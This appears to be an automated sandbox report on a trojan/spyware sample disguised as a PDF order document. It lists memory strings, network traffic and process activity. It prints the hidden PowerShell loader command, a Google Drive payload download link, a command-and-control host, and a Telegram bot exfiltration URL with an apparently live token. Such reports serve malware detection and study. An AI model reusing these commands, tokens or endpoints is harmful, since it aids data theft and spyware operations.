Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.2042349403.0000000007890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microl
Source: powershell.exe, 00000001.00000002.2042349403.000000000794B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros6
Source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: Order requirements CIF Greece_pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Order requirements CIF Greece_pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2957521886.00000000212C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.2957521886.00000000212BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2956435223.0000000020750000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/1
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2943801242.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download
Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/s
Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: msiexec.exe, 00000006.00000002.2957521886.000000002117A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.2957521886.00000000212E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.2957521886.00000000212F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

Code function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405339

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Order requirements CIF Greece_pdf.exe
Source: initial sample	Static PE information: Filename: Order requirements CIF Greece_pdf.exe

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403325

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	File created: C:\Windows\Superpraised	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	File created: C:\Windows\Superpraised\haanlatterens	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	File created: C:\Windows\SysWOW64\narrowness.ini	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04FDE260	1_2_04FDE260
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00ED5061	6_2_00ED5061
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00ED2240	6_2_00ED2240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00ED4DC0	6_2_00ED4DC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00ED3530	6_2_00ED3530
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00EDBEB1	6_2_00EDBEB1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7C147	6_2_20F7C147
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7D278	6_2_20F7D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F75369	6_2_20F75369
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7C468	6_2_20F7C468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7C738	6_2_20F7C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7E988	6_2_20F7E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7CA08	6_2_20F7CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7CCD8	6_2_20F7CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F73E13	6_2_20F73E13
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F7CFAB	6_2_20F7CFAB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F77118	6_2_20F77118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F739CD	6_2_20F739CD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_20F73AA1	6_2_20F73AA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EBB20	6_2_236EBB20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EA6E8	6_2_236EA6E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EAD40	6_2_236EAD40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EF9F0	6_2_236EF9F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E5B69	6_2_236E5B69
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E5B78	6_2_236E5B78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E8748	6_2_236E8748
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E2758	6_2_236E2758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E5720	6_2_236E5720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EE320	6_2_236EE320
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E2300	6_2_236E2300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E571F	6_2_236E571F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EBB1B	6_2_236EBB1B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EE310	6_2_236EE310
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E8FF8	6_2_236E8FF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E5FCF	6_2_236E5FCF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E5FD0	6_2_236E5FD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E8BA0	6_2_236E8BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EE7A1	6_2_236EE7A1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E2BB0	6_2_236E2BB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EE7B0	6_2_236EE7B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E4E6F	6_2_236E4E6F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EDE7F	6_2_236EDE7F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E4E70	6_2_236E4E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E7A40	6_2_236E7A40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E1A50	6_2_236E1A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E9E3A	6_2_236E9E3A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E9E38	6_2_236E9E38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E4A18	6_2_236E4A18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E4A17	6_2_236E4A17
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E22F9	6_2_236E22F9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E82F0	6_2_236E82F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E52C8	6_2_236E52C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E52C7	6_2_236E52C7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EA6D9	6_2_236EA6D9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E1EA8	6_2_236E1EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E1E98	6_2_236E1E98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E7E98	6_2_236E7E98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EA292	6_2_236EA292
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EA290	6_2_236EA290
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EDE90	6_2_236EDE90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E4168	6_2_236E4168
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E4167	6_2_236E4167
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EF560	6_2_236EF560
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E0D48	6_2_236E0D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E0D47	6_2_236E0D47
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EF55B	6_2_236EF55B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EAD37	6_2_236EAD37
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E3D0F	6_2_236E3D0F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E3D10	6_2_236E3D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E15E8	6_2_236E15E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E75E8	6_2_236E75E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E99E2	6_2_236E99E2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E99E0	6_2_236E99E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E15F8	6_2_236E15F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E45C0	6_2_236E45C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EF9DF	6_2_236EF9DF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E11A0	6_2_236E11A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E45BF	6_2_236E45BF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E9588	6_2_236E9588
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E119F	6_2_236E119F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E7192	6_2_236E7192
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E7190	6_2_236E7190
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E3460	6_2_236E3460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E0040	6_2_236E0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EEC40	6_2_236EEC40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E6428	6_2_236E6428
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EEC33	6_2_236EEC33
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E3008	6_2_236E3008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E0006	6_2_236E0006
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E08E1	6_2_236E08E1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E08F0	6_2_236E08F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EF0C0	6_2_236EF0C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EF0D0	6_2_236EF0D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236ED0A8	6_2_236ED0A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E38B8	6_2_236E38B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E0498	6_2_236E0498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236ED098	6_2_236ED098
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236E0497	6_2_236E0497

Source: Order requirements CIF Greece_pdf.exe

Static PE information: invalid certificate

Source: Order requirements CIF Greece_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/13@5/5

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

0_2_00403325

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

Code function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004045EA

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

File created: C:\Users\user\AppData\Roaming\skittaget

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nso3C58.tmp

Jump to behavior

Source: Order requirements CIF Greece_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Order requirements CIF Greece_pdf.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

File read: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
